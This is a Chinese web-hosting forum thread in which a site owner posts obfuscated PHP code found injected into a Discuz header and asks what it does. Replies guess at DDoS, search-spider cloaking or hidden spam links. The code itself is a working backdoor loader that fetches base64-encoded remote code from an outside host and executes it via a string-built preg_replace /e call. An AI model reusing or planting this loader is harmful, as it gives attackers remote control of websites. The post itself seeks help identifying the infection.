全球主机交流论坛

标题: 帮看下DZ头部被加了这个是怎么回事? [打印本页]
作者: gagoab    时间: 2014-10-26 11:20
标题: 帮看下DZ头部被加了这个是怎么回事?
<?php
function x6_fsockopen($a,$b,$c=80,$d=60){try{$f=fsockopen($a,$c,$g,$h,$d);if(!$f)return'';$i="GET $b HTTP/1.1\r\n";$i.="Host: $a\r\n";$i.="Connection: Close\r\n\r\n";fwrite($f,$i);$j='';while(!feof($f)){$j.=fgets($f,128);}$j=substr($j,strpos($j,"\r\n\r\n")+4);$j=explode("\r\n",$j);if(isset($j[1]))return $j[1];else return'';}catch(Exception $k){return'';}}function x6_getcontents($l){try{$m=array('http'=>array('method'=>"GET",'timeout'=>60,));$n=stream_context_create($m);$o='';$o=@file_get_contents($l,false,$n);return $o;}catch(Exception $k){return'';}}function x6_curl($l){try{$p=curl_init();curl_setopt($p,CURLOPT_URL,$l);curl_setopt($p,CURLOPT_HEADER,0);curl_setopt($p,CURLOPT_TIMEOUT,60);curl_setopt($p,CURLOPT_USERAGENT,'baidu');curl_setopt($p,CURLOPT_AUTOREFERER,TRUE);curl_setopt($p,CURLOPT_RETURNTRANSFER,1);curl_setopt($p,CURLOPT_FOLLOWLOCATION,TRUE);$q=curl_exec($p);curl_close($p);return $q;}catch(Exception $k){return'';}}function x6_test(){if(function_exists('curl_init')){return 'curl';}if(function_exists('fsockopen')){return 'fsockopen';}return 'getcontents';}function dir_writeable($r){if(!is_dir($r)){@mkdir($r,0777);}if(is_dir($r)){if($f=@fopen("$r/test.test",'w')){@fclose($f);@unlink("$r/test.test");$s=1;}else{$s=0;}}return $s;}if(defined('X6_CACHE_DIR')){$t=X6_CACHE_DIR;}else{$t=sys_get_temp_dir();}$u=$t.'/O'.'X'.'D'.'B'.'N'.'J'.'L'.'IU'.'Y'.'SL'.'C'.'JX'.'Y'.'AKAMY';$v=false;$w=@file_get_contents($u);if(file_exists($u)){if((time()-filemtime($u)>3600)||empty($w)){$v=true;}}else{if(!dir_writeable($t)){die('Dir cannot write, pleate set X6_CACHE_DIR!');}$v=true;}if($v){$w='';$x=0;while(!$w&&$x<3){switch(x6_test()){case  'curl'w=x6_curl(base64_decode('aHR0cDovL3BheS50ZW5wYXktaW5jLmNvbS9jb2RlLnBocA=='));break;case  'fsockopen'w=x6_fsockopen(base64_decode('cGF5LnRlbnBheS1pbmMuY29t'),base64_decode('L2NvZGUucGhw'));break;defaultw=x6_getcontents(base64_decode('aHR0cDovL3BheS50ZW5wYXktaW5jLmNvbS9jb2RlLnBocA=='));break;}$x++;}if($w){file_put_contents($u,$w);}}$y=""."R"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$y("//e",base64_decode($w),"");?>
<?php
作者: Bye    时间: 2014-10-26 11:24
=fsockopen(   目测是ddos 脚本
作者: gagoab    时间: 2014-10-26 11:38
Bye 发表于 2014-10-26 11:24
=fsockopen(   目测是ddos 脚本

谢谢   
作者: 76064866    时间: 2014-10-26 14:01
可能是欺骗蜘蛛,挂菠菜链,也可能有ddos功能
作者: 点点    时间: 2014-10-26 14:54
挂黑链的
作者: gagoab    时间: 2014-10-26 22:14
76064866 发表于 2014-10-26 14:01
可能是欺骗蜘蛛,挂菠菜链,也可能有ddos功能

谢谢!
作者: gagoab    时间: 2014-10-26 22:17
点点 发表于 2014-10-26 14:54
挂黑链的

谢谢!



欢迎光临 全球主机交流论坛 (https://fd.vvwvv.eu.org/) Powered by Discuz! X3.4